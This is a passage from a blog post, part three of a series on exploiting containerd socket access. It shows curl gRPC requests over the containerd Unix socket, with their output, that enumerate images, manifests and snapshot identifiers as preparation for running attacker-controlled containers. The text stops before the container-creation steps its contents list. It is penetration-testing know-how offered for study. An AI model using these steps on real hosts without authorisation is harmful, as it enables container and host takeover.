- Running our own containers with curl
- Find a suitable local container
- Get the container image identifier for this CPU architecture
- Get the snapshot overlayfs identifier for the container image
- Get details about the container image to use to create a container
- Create a snapshot to act as the container's filesystem
- Create the container
- Create and start a task
- Run a command in an existing container
- Delete a running container
This is the third and final part in my series on exploiting access to the containerd socket.
As a recap, in part 1, I covered the “easy” socket access exploitation method of using the ctr tool to do things such as running your own containers and executing code in existing containers. In part 2, I covered the much more complicated curl exploitation approach, introducing how to parse the binary messages used by the containerd API and showing “simple” examples of how to talk to the containerd socket using curl.
In this part, I show the more complicated curl examples, including how to run your own containers and how to run code in existing containers. As demonstrated in part 2, using curl, while possible, is not exactly easy, and the examples only get more complicated in this post. To understand what's going on below, you will need to be familiar with some of the content from the previous posts.
In particular:
- In part 1, I talked about containerd namespaces, and how the communication channels for container processes are not available through the API itself, but instead are routed through named pipe files in the host filesystem. The same concepts are in play here when we run our own containers or run additional code in existing containers.
- In part 2, I talked about how you can identify the calls in the containerd API, how you can parse the binary messages used by the API, and how you can use curl to make the API calls. These same techniques are used in this post, and can be considered required knowledge for what's discussed below.
I will also note that, to run our own containers or to run a process in an existing container, we need write access to a location on the containerd host's filesystem where we can create named pipe files for the process stdin, stdout and stderr channels. The reason for this was raised in part 1 in the section on executing code in containers here, so make sure there is such a location, even a temp directory, before proceeding.
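To sketch that prerequisite, the three pipes can be created ahead of time with mkfifo; the /tmp/fifos directory below is a hypothetical example location, not something the API mandates:

```python
import os

# Hypothetical host-writable location; any directory that containerd can
# also reach on the host filesystem will do.
fifo_dir = "/tmp/fifos"
os.makedirs(fifo_dir, exist_ok=True)

fifo_paths = {}
for name in ("stdin", "stdout", "stderr"):
    path = os.path.join(fifo_dir, name)
    if not os.path.exists(path):
        os.mkfifo(path)  # create the named pipe for this I/O channel
    fifo_paths[name] = path

print(sorted(fifo_paths))
```

These are the paths we will later reference when creating tasks and exec processes.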
Running our own containers with curl
Running our own containers involves the following steps:
- Find a suitable local container
- Get the container image identifier for this CPU architecture
- Get the snapshot overlayfs identifier for the container image
- Get details about the container image to use to create a container
- Create a snapshot to act as the container's filesystem
- Create the container
- Create and start a task
Find a suitable local container
As with the ctr example from part 1, we first want to list the container images available locally so we can identify an image to use for the container we want to run. The images protocol definition file can be used to view services relating to images.
An important thing to note here is that this is the first of the .proto files we have looked at so far that has a GitHub-based dependency, which you can see here.
The line looks like this:
import "github.com/containerd/containerd/api/types/descriptor.proto";
In this case, we want to download the dependency file individually, process it using protoc (as discussed in part 2), store the .proto file and the generated Python output in the present working directory, and change the import line as follows.
import "descriptor.proto";
Remember to do this for all future .proto files to make sure they will work correctly.
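Since every dependency file needs the same edit, a small helper can automate it. This is just a sketch of the rewrite described above, not part of any protobuf tooling:

```python
import re

def localize_proto_imports(proto_text: str) -> str:
    """Rewrite GitHub-path imports to bare filenames, e.g.
    import "github.com/containerd/containerd/api/types/descriptor.proto";
    becomes
    import "descriptor.proto";
    """
    return re.sub(
        r'import\s+"(?:[^"]*/)?([^"/]+\.proto)";',
        r'import "\1";',
        proto_text,
    )

example = 'import "github.com/containerd/containerd/api/types/descriptor.proto";'
print(localize_proto_imports(example))  # import "descriptor.proto";
```

Run it over each downloaded .proto file before passing the file to protoc; imports that are already bare filenames pass through unchanged.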
Once the images.proto file is processed, we can get the related list of API services:
$ ./protobuf_parser.py -m images_pb2.py
Services:
* /containerd.services.images.v1.Images/Get
Input: GetImageRequest
Output: GetImageResponse
* /containerd.services.images.v1.Images/List
Input: ListImagesRequest
Output: ListImagesResponse
* /containerd.services.images.v1.Images/Create
Input: CreateImageRequest
Output: CreateImageResponse
* /containerd.services.images.v1.Images/Update
Input: UpdateImageRequest
Output: UpdateImageResponse
* /containerd.services.images.v1.Images/Delete
Input: DeleteImageRequest
Output: Empty
==================================
[SNIP]
As we see from the above, the /containerd.services.images.v1.Images/List operation involves sending ListImagesRequest messages and getting ListImagesResponse messages in response. The definition for the ListImagesRequest looks like the following:
* ListImagesRequest
Fields:
filters - string
Rough JSON example (might need tweaking):
{
"filters": "string"
}
As with a number of the message types we looked at in part 2, the ListImagesRequest message has a single input field, filters, which can be left empty if we want to list all images. This means we can use an empty message as input. The following command shows how to list images in the k8s.io namespace.
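The five bytes piped into curl below are the standard gRPC wire framing: one compression-flag byte plus a four-byte big-endian message length, all zero for an empty message. A sketch:

```python
def grpc_frame(payload: bytes) -> bytes:
    """Prefix a serialized protobuf message with the 5-byte gRPC header:
    1 compression-flag byte (0 = uncompressed) + 4-byte big-endian length."""
    return b"\x00" + len(payload).to_bytes(4, "big") + payload

# An empty ListImagesRequest serializes to zero bytes, so the frame is
# just the five zero bytes echoed into curl below.
print(grpc_frame(b""))  # b'\x00\x00\x00\x00\x00'
```

The same framing wraps every non-empty request body in this post; the protobuf_parser.py output files already include it.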
$ echo -ne "\x00\x00\x00\x00\x00" | sudo curl -v -s --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "te: trailers" -H "grpc-accept-encoding: gzip" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.images.v1.Images/List --data-binary @- --output listimagesresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55f7bd403ec0)
> POST /containerd.services.images.v1.Images/List HTTP/2
> Host: localhost
> user-agent: curl/7.81.0
> accept: */*
> content-type: application/grpc
> te: trailers
> grpc-accept-encoding: gzip
> containerd-namespace: k8s.io
> content-length: 5
>
} [5 bytes data]
* We are completely uploaded and fine
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
< HTTP/2 200
< content-type: application/grpc
<
{ [32727 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
The response in file listimagesresponse.bin is a ListImagesResponse, and we can parse it and check for nginx images as we did in the ctr example in part 1 like so:
$ ./protobuf_parser.py -m images_pb2.py -d listimagesresponse.bin -t ListImagesResponse | grep nginx
name: "docker.io/library/nginx:1.14.2"
name: "docker.io/library/nginx@sha256:32da30332506740a2f7c34d5dc70467b7f14ec67d912703568daff790ab3f755"
name: "docker.io/library/nginx@sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d"
[SNIP]
We have the image identifier for our nginx image, which is docker.io/library/nginx:1.14.2.
Get the container image identifier for this CPU architecture
Now we want to get the image details. From the services listing for the Images service above, we can see the /containerd.services.images.v1.Images/Get operation involves sending GetImageRequest messages and getting GetImageResponse messages in response. The definition for the GetImageRequest looks as follows:
* GetImageRequest
Fields:
name - string
Rough JSON example (might need tweaking):
{
"name": "string"
}
In this case we actually need to send a protobuf message with some content in it. We can create one from a JSON template using the protobuf_parser.py tool like so:
$ cat getimage.json
{"name": "docker.io/library/nginx:1.14.2"}
$ ./protobuf_parser.py -m images_pb2.py -t GetImageRequest -i getimage.json -o /tmp/getimage.bin
Written to /tmp/getimage.bin
The message has been encoded into protobuf binary format in file getimage.bin. We can either read this directly from the file with curl (shown below) or we could hexlify it and pipe it to curl using the echo command (a tool to do this is available here if needed).
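As a sketch of the hexlify option, any of the binary request files can be turned into an echo -ne compatible string with a few lines of Python (the function name here is my own):

```python
def to_hex_escapes(data: bytes) -> str:
    """Render binary request bytes as \\xNN escapes suitable for echo -ne."""
    return "".join(f"\\x{b:02x}" for b in data)

# The empty-message frame from earlier renders as the familiar five zero
# bytes; a request file works the same way, e.g.
# to_hex_escapes(open("getimage.bin", "rb").read())
print(to_hex_escapes(b"\x00\x00\x00\x00\x00"))
```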
Here we make the curl request, reading the content from the file on disk.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.images.v1.Images/Get --data-binary @getimage.bin --output getimageresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x561c6e1d7eb0)
> POST /containerd.services.images.v1.Images/Get HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 37
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [37 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [242 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
The GetImageResponse formatted response is in file getimageresponse.bin, as created by curl in the command above. We can parse it like so.
$ ./protobuf_parser.py -m images_pb2.py -d getimageresponse.bin -t GetImageResponse
image {
name: "docker.io/library/nginx:1.14.2"
labels {
key: "io.cri-containerd.image"
value: "managed"
}
target {
media_type: "application/vnd.docker.distribution.manifest.list.v2+json"
digest: "sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d"
size: 2029
}
created_at {
seconds: 1697590445
nanos: 454204347
}
updated_at {
seconds: 1697590450
nanos: 558546668
}
}
This gives us a manifest list for this image with an identifier of sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d and a size of 2029, which we will use in the following step.
We next need to get some information about the content of the manifest list, for which we can use the content protocol definition file.
The services associated with this API are as follows.
$ ./protobuf_parser.py -m content_pb2.py
Services:
* /containerd.services.content.v1.Content/Info
Input: InfoRequest
Output: InfoResponse
* /containerd.services.content.v1.Content/Update
Input: UpdateRequest
Output: UpdateResponse
* /containerd.services.content.v1.Content/List
Input: ListContentRequest
Output: ListContentResponse
* /containerd.services.content.v1.Content/Delete
Input: DeleteContentRequest
Output: Empty
* /containerd.services.content.v1.Content/Read
Input: ReadContentRequest
Output: ReadContentResponse
* /containerd.services.content.v1.Content/Status
Input: StatusRequest
Output: StatusResponse
* /containerd.services.content.v1.Content/ListStatuses
Input: ListStatusesRequest
Output: ListStatusesResponse
* /containerd.services.content.v1.Content/Write
Input: WriteContentRequest
Output: WriteContentResponse
* /containerd.services.content.v1.Content/Abort
Input: AbortRequest
Output: Empty
To get the content of the manifest list we are interested in the /containerd.services.content.v1.Content/Read service, which uses the ReadContentRequest and ReadContentResponse messages. The ReadContentRequest message looks as follows:
* ReadContentRequest
Fields:
digest - string
offset - int64
size - int64
Rough JSON example (might need tweaking):
{
"digest": "string",
"offset": int64,
"size": int64
}
We can create a request to get the content of the previously mentioned manifest list as follows:
$ cat readcontentrequest.json
{"digest": "sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d", "size": 2029}
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentRequest -i readcontentrequest.json -o readcontentrequest.bin
Written to readcontentrequest.bin
Send the request as follows:
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest.bin --output readcontentresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55ec533d1eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [2037 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Parse the response as a ReadContentResponse message:
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentResponse -d readcontentresponse.bin
data: "{\n "schemaVersion": 2,\n "mediaType": "application/vnd.docker.distribution.manifest.list.v2+json",\n "manifests": [\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078",\n "platform": {\n "architecture": "amd64",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:17a1998407746106c307c58c5089569bc1d0728567657b8c19ccffd0497c91ba",\n "platform": {\n "architecture": "arm",\n "os": "linux",\n "variant": "v7"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:d58b3e481b8588c080b42e5d7427f2c2061decbf9194f06e2adce641822e282a",\n "platform": {\n "architecture": "arm64",\n "os": "linux",\n "variant": "v8"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:de4556bb2971a581b6ce23bcbfd3dbef6ee1640839d2c88b3e846a4e101f363c",\n "platform": {\n "architecture": "386",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:750c35f5051eebd0d1a2faa08a29d3eabd330c8cf0350b57353d205a99c47176",\n "platform": {\n "architecture": "ppc64le",\n "os": "linux"\n }\n },\n {\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "size": 948,\n "digest": "sha256:e76ff864168bca4ef1a53cfaf5fb4981cdb2810385b4b4edc19fd94a5d04eb38",\n "platform": {\n "architecture": "s390x",\n "os": "linux"\n }\n }\n ]\n}"
The response is a list of manifests. We want the one that matches the architecture of the current system, which in this case is amd64. Consequently, we want the manifest with identifier sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078 and size 948. We now craft another ReadContentRequest message to get the container image details from this manifest.
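A sketch of the architecture selection, using a trimmed copy of the manifest list above (on a live system you could derive the architecture from uname -m, remembering that x86_64 maps to amd64):

```python
import json

def pick_manifest(manifest_list: dict, arch: str) -> dict:
    """Select the manifest entry matching the given CPU architecture."""
    for entry in manifest_list["manifests"]:
        if entry["platform"]["architecture"] == arch:
            return entry
    raise LookupError(f"no manifest for {arch}")

# Trimmed excerpt of the manifest list returned above.
manifest_list = json.loads('''{
  "manifests": [
    {"digest": "sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078",
     "size": 948, "platform": {"architecture": "amd64", "os": "linux"}},
    {"digest": "sha256:d58b3e481b8588c080b42e5d7427f2c2061decbf9194f06e2adce641822e282a",
     "size": 948, "platform": {"architecture": "arm64", "os": "linux", "variant": "v8"}}
  ]
}''')

chosen = pick_manifest(manifest_list, "amd64")
print(chosen["digest"], chosen["size"])
```

The digest and size printed are exactly the two values carried into the next request.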
$ cat readcontentrequest2.json
{"digest": "sha256:706446e9c6667c0880d5da3f39c09a6c7d2114f5a5d6b74a2fafd24ae30d2078", "size": 948}
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentRequest -i readcontentrequest2.json -o readcontentrequest2.bin
Written to readcontentrequest2.bin
Send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest2.bin --output readcontentresponse2.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x562fb0428eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [956 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Parse the response to get the details of the manifest.
$ ./protobuf_parser.py -m content_pb2.py -t ReadContentResponse -d readcontentresponse2.bin
data: "{\n "schemaVersion": 2,\n "mediaType": "application/vnd.docker.distribution.manifest.v2+json",\n "config": {\n "mediaType": "application/vnd.docker.container.image.v1+json",\n "size": 6003,\n "digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"\n },\n "layers": [\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 22496048,\n "digest": "sha256:27833a3ba0a545deda33bb01eaf95a14d05d43bf30bce9267d92d17f069fe897"\n },\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 22204973,\n "digest": "sha256:0f23e58bd0b7c74311703e20c21c690a6847e62240ed456f8821f4c067d3659b"\n },\n {\n "mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",\n "size": 203,\n "digest": "sha256:8ca774778e858d3f97d9ec1bec1de879ac5e10096856dc22ed325a3ad944f78a"\n }\n ]\n}"
From this response we get the details of the container image, which has identifier sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369 and a size of 6003.
Get the snapshot overlayfs identifier for the container image
We now need to make a /containerd.services.content.v1.Content/Info request to get the snapshot identifier for this container image. This API call uses the InfoRequest and InfoResponse messages. The InfoRequest looks as follows:
* InfoRequest
Fields:
digest - string
Rough JSON example (might need tweaking):
{
"digest": "string"
}
Let's create an InfoRequest for the container image we identified above.
$ cat inforequest.json
{"digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"}
$ ./protobuf_parser.py -m content_pb2.py -t InfoRequest -i inforequest.json -o inforequest.bin
Written to inforequest.bin
Now send the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Info --data-binary @inforequest.bin --output inforesponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x55ca70ebaeb0)
> POST /containerd.services.content.v1.Content/Info HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 78
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [78 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [290 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now let's parse the response so we can get the snapshot overlay details.
$ ./protobuf_parser.py -m content_pb2.py -t InfoResponse -d inforesponse.bin
info {
digest: "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369"
size: 6003
created_at {
seconds: 1697590436
nanos: 851140635
}
updated_at {
seconds: 1697590450
nanos: 555865938
}
labels {
key: "containerd.io/gc.ref.snapshot.overlayfs"
value: "sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3"
}
labels {
key: "containerd.io/distribution.source.docker.io"
value: "library/nginx"
}
}
From the above, the overlay snapshot identifier is sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3. We will use this later to create an overlayfs filesystem snapshot for the container to use.
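Since protobuf_parser.py prints responses in protobuf text format, a quick regex over that output is one way to grab the digest; a sketch against the labels shown above:

```python
import re

# Excerpt of the protobuf text-format output from the InfoResponse above.
info_text = '''
labels {
  key: "containerd.io/gc.ref.snapshot.overlayfs"
  value: "sha256:19606512dfe192788a55d7c1efb9ec02041b4e318587632f755c5112f927e0e3"
}
'''

m = re.search(
    r'key: "containerd\.io/gc\.ref\.snapshot\.overlayfs"\s*'
    r'value: "(sha256:[0-9a-f]+)"',
    info_text,
)
snapshot_digest = m.group(1)
print(snapshot_digest)
```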
Get details about the container image to use to create a container
We also want to get some details about the image itself for use when we create the container. We can do this using the /containerd.services.content.v1.Content/Read API call, which uses ReadContentRequest and ReadContentResponse messages. The ReadContentRequest message looks like the following:
* ReadContentRequest
Fields:
digest - string
offset - int64
size - int64
Rough JSON example (might need tweaking):
{
"digest": "string",
"offset": int64,
"size": int64
}
Let's create one of these messages to get details about the container image.
$ cat readcontentrequest.json
{"digest": "sha256:295c7be079025306c4f1d65997fcf7adb411c88f139ad1d34b537164aa060369", "size": 6003}
$ ./protobuf_parser.py -m content_pb2.py -i readcontentrequest.json -o readcontentrequest.bin -t ReadContentRequest
Written to readcontentrequest.bin
Make the request.
$ sudo curl -s -v --http2-prior-knowledge --unix-socket /run/containerd/containerd.sock -X POST -H "content-type: application/grpc" -H "user-agent: grpc-go/1.59.0" -H "te: trailers" -H "containerd-namespace: k8s.io" http://localhost/containerd.services.content.v1.Content/Read --data-binary @readcontentrequest.bin --output readcontentresponse.bin
* Trying /run/containerd/containerd.sock:0...
* Connected to localhost (/run/containerd/containerd.sock) port 80 (#0)
* Using HTTP2, server supports multiplexing
* Connection state changed (HTTP/2 confirmed)
* Copying HTTP/2 data in stream buffer to connection buffer after upgrade: len=0
* Using Stream ID: 1 (easy handle 0x5594f4dd9eb0)
> POST /containerd.services.content.v1.Content/Read HTTP/2
> Host: localhost
> accept: */*
> content-type: application/grpc
> user-agent: grpc-go/1.59.0
> te: trailers
> containerd-namespace: k8s.io
> content-length: 81
>
* Connection state changed (MAX_CONCURRENT_STREAMS == 4294967295)!
} [81 bytes data]
* We are completely uploaded and fine
< HTTP/2 200
< content-type: application/grpc
<
{ [6011 bytes data]
< grpc-status: 0
< grpc-message:
* Connection #0 to host localhost left intact
Now let's look at the response to get details of the container image.
$ ./protobuf_parser.py -m content_pb2.py -d readcontentresponse.bin -t ReadContentResponse
data: "{"architecture":"amd64","config":{"Hostname":"","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["nginx","-g","daemon off;"],"ArgsEscaped":true,"Image":"sha256:ac539667b75fa925232b8dbbfdfb8adb98007c44e11a5fbd4001916c0fcc0bd4","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"maintainer":"NGINX Docker Maintainers \[email protected]\u003e"},"StopSignal":"SIGTERM"},"container":"5e8d96e0fb01832974f0680a9aff2fbadc37fcf30447ae30e19f59b926672041","container_config":{"Hostname":"5e8d96e0fb01","Domainname":"","User":"","AttachStdin":false,"AttachStdout":false,"AttachStderr":false,"ExposedPorts":{"80/tcp":{}},"Tty":false,"OpenStdin":false,"StdinOnce":false,"Env":["PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin","NGINX_VERSION=1.14.2-1~stretch","NJS_VERSION=1.14.2.0.2.6-1~stretch"],"Cmd":["/bin/sh","-c","#(nop) ","CMD [\"nginx\" \"-g\" \"daemon off;\"]"],"ArgsEscaped":true,"Image":"sha256:ac539667b75fa925232b8dbbfdfb8adb98007c44e11a5fbd4001916c0fcc0bd4","Volumes":null,"WorkingDir":"","Entrypoint":null,"OnBuild":null,"Labels":{"maintainer":"NGINX Docker Maintainers \[email protected]\u003e"},"StopSignal":"SIGTERM"},"created":"2019-03-26T23:14:52.227945051Z","docker_version":"18.06.1-ce","history":[{"created":"2019-03-26T22:41:26.106246179Z","created_by":"/bin/sh -c #(nop) ADD file:4fc310c0cb879c876c5c0f571af665a0d24d36cb9263e0f53b0cda2f7e4b1844 in / "},{"created":"2019-03-26T22:41:26.302497847Z","created_by":"/bin/sh -c #(nop) CMD [\"bash\"]","empty_layer":true},{"created":"2019-03-26T23:13:16.970741082Z","created_by":"/bin/sh -c #(nop) LABEL maintainer=NGINX Docker Maintainers \[email 
protected]\u003e","empty_layer":true},{"created":"2019-03-26T23:14:26.130250839Z","created_by":"/bin/sh -c #(nop) ENV NGINX_VERSION=1.14.2-1~stretch","empty_layer":true},{"created":"2019-03-26T23:14:26.292539689Z","created_by":"/bin/sh -c #(nop) ENV NJS_VERSION=1.14.2.0.2.6-1~stretch","empty_layer":true},{"created":"2019-03-26T23:14:50.851725507Z","created_by":"/bin/sh -c set -x \t\u0026\u0026 apt-get update \t\u0026\u0026 apt-get install --no-install-recommends --no-install-suggests -y gnupg1 apt-transport-https ca-certificates \t\u0026\u0026 \tNGINX_GPGKEY=573BFD6B3D8FBC641079A6ABABF5BD827BD9BF62; \tfound=''; \tfor server in \t\tha.pool.sks-keyservers.net \t\thkp://keyserver.ubuntu.com:80 \t\thkp://p80.pool.sks-keyservers.net:80 \t\tpgp.mit.edu \t; do \t\techo \"Fetching GPG key $NGINX_GPGKEY from $server\"; \t\tapt-key adv --keyserver \"$server\" --keyserver-options timeout=10 --recv-keys \"$NGINX_GPGKEY\" \u0026\u0026 found=yes \u0026\u0026 break; \tdone; \ttest -z \"$found\" \u0026\u0026 echo \u003e\u00262 \"error: failed to fetch GPG key $NGINX_GPGKEY\" \u0026\u0026 exit 1; \tapt-get remove --purge --auto-remove -y gnupg1 \u0026\u0026 rm -rf /var/lib/apt/lists/* \t\u0026\u0026 dpkgArch=\"$(dpkg --print-architecture)\" \t\u0026\u0026 nginxPackages=\" \t\tnginx=${NGINX_VERSION} \t\tnginx-module-xslt=${NGINX_VERSION} \t\tnginx-module-geoip=${NGINX_VERSION} \t\tnginx-module-image-filter=${NGINX_VERSION} \t\tnginx-module-njs=${NJS_VERSION} \t\" \t\u0026\u0026 case \"$dpkgArch\" in \t\tamd64|i386) \t\t\techo \"deb https://nginx.org/packages/debian/ stretch nginx\" \u003e\u003e /etc/apt/sources.list.d/nginx.list \t\t\t\u0026\u0026 apt-get update \t\t\t;; \t\t*) \t\t\techo \"deb-src https://nginx.org/packages/debian/ stretch nginx\" \u003e\u003e /etc/apt/sources.list.d/nginx.list \t\t\t\t\t\t\u0026\u0026 tempDir=\"$(mktemp -d)\" \t\t\t\u0026\u0026 chmod 777 \"$tempDir\" \t\t\t\t\t\t\u0026\u0026 savedAptMark=\"$(apt-mark showmanual)\" \t\t\t\t\t\t\u0026\u0026 apt-get 
update \t\t\t\u0026\u0026 apt-get build-dep -y $nginxPackages \t\t\t\u0026\u0026 ( \t\t\t\tcd \"$tempDir\" \t\t\t\t\u0026\u0026 DEB_BUILD_OPTIONS=\"nocheck parallel=$(nproc)\" \t\t\t\t\tapt-get source --compile $nginxPackages \t\t\t) \t\t\t\t\t\t\u0026\u0026 apt-mark showmanual | xargs apt-mark auto \u003e /dev/null \t\t\t\u0026\u0026 { [ -z \"$savedAptMark\" ] || apt-mark manual $savedAptMark; } \t\t\t\t\t\t\u0026\u0026 ls -lAFh \"$tempDir\" \t\t\t\u0026\u0026 ( cd \"$tempDir\" \u0026\u0026 dpkg-scanpackages . \u003e Packages ) \t\t\t\u0026\u0026 grep '^Package: ' \"$tempDir/Packages\" \t\t\t\u0026\u0026 echo \"deb [ trusted=yes ] file://$tempDir ./\" \u003e /etc/apt/sources.list.d/temp.list \t\t\t\u0026\u0026 apt-get -o Acquire::GzipIndexes=false update \t\t\t;; \tesac \t\t\u0026\u0026 apt-get install --no-install-recommends --no-install-suggests -y \t\t\t\t\t\t$nginxPackages \t\t\t\t\t\tgettext-base \t\u0026\u0026 apt-get remove --purge --auto-remove -y apt-transport-https ca-certificates \u0026\u0026 rm -rf /var/lib/apt/lists/* /etc/apt/sources.list.d/nginx.list \t\t\u0026\u0026 if [ -n \"$tempDir\" ]; then \t\tapt-get purge -y --auto-remove \t\t\u0026\u0026 rm -rf \"$tempDir\" /etc/apt/sources.list.d/temp.list; \tfi"},{"created":"2019-03-26T23:14:51.711682497Z","created_by":"/bin/sh -c ln -sf /dev/stdout /var/log/nginx/access.log \t\u0026\u0026 ln -sf /dev/stderr /var/log/nginx/error.log"},{"created":"2019-03-26T23:14:51.894981136Z","created_by":"/bin/sh -c #(nop) EXPOSE 80","empty_layer":true},{"created":"2019-03-26T23:14:52.059858592Z","created_by":"/bin/sh -c #(nop) STOPSIGNAL SIGTERM","empty_layer":true},{"created":"2019-03-26T23:14:52.227945051Z","created_by":"/bin/sh -c #(nop) CMD [\"nginx\" \"-g\" \"daemon 
off;\"]","empty_layer":true}],"os":"linux","rootfs":{"type":"layers","diff_ids":["sha256:5dacd731af1b0386ead06c8b1feff9f65d9e0bdfec032d2cd0bc03690698feda","sha256:b8f18c3b860b067be09836beadd676a0aa1e784ec28cf730986859b4146c344a","sha256:82ae01d5004e2143b642b1a008624e7521c73ab18e5776a22f18a172b9dbec80"]}}"
There is information here that we will use when we create our container spec: args from the Cmd value, env from Env, and some label values.
